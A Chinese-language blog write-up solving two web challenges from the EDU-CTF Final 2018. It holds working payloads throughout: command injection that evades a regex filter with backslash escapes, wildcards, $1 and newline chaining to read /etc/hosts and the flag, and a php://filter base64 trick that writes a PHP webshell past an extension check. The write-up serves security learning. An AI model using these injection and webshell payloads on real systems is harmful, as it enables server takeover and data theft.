EDU-CTF Final 2018 Web小记
文章首发于安全客:https://www.anquanke.com/post/id/170361
当时比赛的时候正在复习期末,根本没空玩。昨天考完科二,终于有时间仔细看看了。
TwoFile
直接给出源码,要命令执行
<?php
highlight_file(__FILE__);
$file1 = $_GET['f1'];
$file2 = $_GET['f2'];
// WAF
if(preg_match("/\'|\"|;|,|\`|\*|\\|\n|\t|\r|\xA0|\{|\}|\(|\)|<|\&[^\d]|@|\||ls|cat|sh|flag|find|grep|echo|w/is", $file1))
$file1 = "";
if(preg_match("/\'|\"|;|,|\`|\*|\\|\n|\t|\r|\xA0|\{|\}|\(|\)|<|\&[^\d]|@|\||ls|cat|sh|flag|find|grep|echo|w/is", $file2))
$file2 = "";
// Prevent injection
$file1 = '"' . $file1 . '"';
$file2 = '"' . $file2 . '"';
$cmd = "file $file1 $file2";
system($cmd);
首先来看看最后的执行
$cmd = "file $file1 $file2";
system($cmd);
system函数执行file命令,而后面有两段是可控的。
来看看file命令的使用:http://man.linuxde.net/file
语法:file(选项)(参数)
选项:
-b:列出辨识结果时,不显示文件名称;
-c:详细显示指令执行过程,便于排错或分析程序执行的情形;
-f<名称文件>:指定名称文件,其内容有一个或多个文件名称时,让file依序辨识这些文件,格式为每列一个文件名称;
-L:直接显示符号连接所指向的文件类别;
-m<魔法数字文件>:指定魔法数字文件;
-v:显示版本信息;
-z:尝试去解读压缩文件的内容。-z:尝试去解读压缩文件的内容。
首先不考虑任意命令执行的可能,只用file命令去读文件。那么如何去绕过WAF和Prevent injection呢。观察WAF之后发现了一个漏洞点:waf是用\\来过滤反斜线的。而查资料之后可以发现
正确的正则匹配反斜线应该是\\\\,而\就可以在最后执行的语句中出现了,而反斜杠的使用就可以轻松绕过Prevent injection。就能结合file命令的选项去读文件了。
下面给出几个payload:
其实file命令本身的-f参数就能直接读文件了
$file1:-f
$file2:/etc/hosts
最后传进去的命令file "-f" "/etc/hosts"
-f参数将文件的内容当作文件名去读取,若文件不存在的话就可以在报错中看到内容。因为waf了w所以读取/etc/hosts,这里并没有使用到通配符绕过,因为file1处并没有使用反斜杠,所以后面的内容是被双引号括起来的,通配符不被识别。
或是-m参数
$file1:-m
$file2:/etc/hosts
最后传入file "-m" " /etc/hosts",然而不知道为什么我在终端跑可以,在php这里执行就没回显,如果有师傅知道请指点一波。我感觉是双引号的锅,$cmd是被双引号括起来的,应该发生了一些东西。
然后是通过f1传入反斜杠来读取文件。
在转义掉双引号之后,可以使用通配符来绕过关键词。比如我在根目录创建了flag文件。
$file1: \
$file2: -m /fl?g 2>&1 #(注意空格和url编码之后传参)
2>&1 :接着,标准错误输出重定向(等同于)标准输出,因为之前标准输出已经重定向到了空设备文件,所以标准错误输出也重定向到空设备文件。
这里如果不加2>&1的话是执行不了的。原因应该和上面那个一样
-f的话就不需要了
$file1: \
$file2: -f /f?ag #
或者
使用$1来绕过。
$file1: \
$file2: -f /fl$1ag #
在linux中,$1作为一个变量,默认为空,同样达到了bypass关键词的效果。
或是考虑执行其他命令的情况,这个我在比赛的时候就想到了,读文件有好多别的方法:https://blog.csdn.net/yuyongpeng/article/details/1818713
我这里用tac。那么要怎么分隔两个命令呢?我这里用的是%0a,可以轻松绕过正则中的\n,相信这一点大家在sql注入中遇到的太多了。
/?f1=\&f2=%20%0atac /f?ag%0a
HackerTyper
由于环境没有了,所以我这里把关键代码拿出来看的。
<?php
$sandbox = "/var/www/html/sandbox/" . md5($_SERVER['REMOTE_ADDR'] . "QQ");
@mkdir($sandbox);
@chdir($sandbox);
$path = 'code.txt';
if ( isset($_GET['_']) && isset($_GET['f']) ) {
$_ = $_GET['_'];
$f = $_GET['f'];
if(preg_match("/h/is", pathinfo($f, PATHINFO_EXTENSION)))
die("No h4cker will use h :p");
$c = "Q____Q" . base64_encode($_);
$path = 'sandbox/' . md5($_SERVER['REMOTE_ADDR'] . "QQ") . '/' . $f;
echo $path;
@file_put_contents($f, $c);
}
?>
题目思路很清晰,绕过waf写shell。
waf是文件后缀不能带有h,而且shell的内容会被base64_encode然后最前面拼接上Q____Q
一步一步来分析。首先是后缀的bypass
关键代码:
if(preg_match("/h/is", pathinfo($f, PATHINFO_EXTENSION)))
die("No h4cker will use h :p");
可以利用pathinfo($f, PATHINFO_EXTENSION)的漏洞来绕过waf。首先来做个实验。
pathinfo($f, PATHINFO_EXTENSION)获取的是.后面的内容,绕过出现两个.,最后结果是后面一个.后面的内容
所以只要使用ylg.php/.就能简单绕过。
因为会给内容自动base64_encode,所以只要输入来做base64 decode就可以将shell写入了。
这里可以使用php://filter来控制base64_decode的输入。可以参考p牛的文章:https://www.leavesongs.com/PENETRATION/php-filter-magic.html 很经典的绕过姿势。想起来去年NCTF2017的时候还见过。
base64_encode('<?php system($_GET[1])?>aa') 的结果PD9waHAgc3lzdGVtKCRfR0VUWzFdKT8+YWE=
echo urlencode(base64_decode("aaPD9waHAgc3lzdGVtKCRfR0VUWzFdKT8+YWE="));
为什么要在前面加aa呢,因为base64算法解码时是4个byte一组,所以给他增加2个a,和前面的Q_____Q一共8个字符。
最后Payload:
/?f=php://filter/convert.base64-decode/resource=ylg.php/.&_=i%A3%C3%F7%06%87%02%077%977FV%D2%82E%F4tUE%B3%15%D2%93%F3%E6%16
成功写shell~
2303
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
